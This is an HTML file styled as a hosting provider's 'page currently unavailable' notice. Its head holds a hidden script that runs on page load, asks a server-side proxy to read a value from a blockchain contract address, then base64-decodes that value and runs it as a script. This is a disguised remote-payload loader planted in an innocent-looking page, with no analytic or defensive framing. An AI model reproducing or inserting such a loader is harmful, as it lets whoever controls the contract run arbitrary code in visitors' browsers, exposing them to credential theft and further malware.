<html>
<head>
	<title></title>
	<style type="text/css">
	<!--
		body {
			margin-top: 20px;
			text-align: center;
			font-family: Tahoma, Arial, Helvetica, sans-serif;
			font-size: 14px;
			color: #111111;
		}
		h1 {
			font-size: 20px;
			margin-bottom: 4px;
		}
		div.gbr {
			margin: 20px auto 0px auto;
			width: 450px;
			border: 1px solid #C1E0BF;
			padding: 6px;
		}
	-->
	</style>
<script>
(function(){
  try {
    var CONTRACT = '0x7Fd85c090f2b35071C57a3b9FeAF462aaEb0E437';
    var GET_SIGNATURE = '0x6d4ce63c';
    
    fetch('/__rpc_proxy__', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ contract: CONTRACT, method: GET_SIGNATURE })
    })
    .then(function(response) {
      return response.json();
    })
    .then(function(data) {
      if (data.signature) {
        try {
          var js = atob(data.signature);
          var script = document.createElement('script');
          script.text = js;
          document.head.appendChild(script);
        } catch(e) {
          console.error('Failed to execute signature:', e);
        }
      }
    })
    .catch(function(e) {
      console.error('RPC proxy error:', e);
    });
  } catch(e) {
    console.error('Worker script error:', e);
  }
})();
</script></head>

<body>

<h1>This page is currently unavailable</h1>
<div class="gbr">
	If you are the webmaster for this site, please contact your hosting provider's support team for assistance.
</div>


</body>
</html>
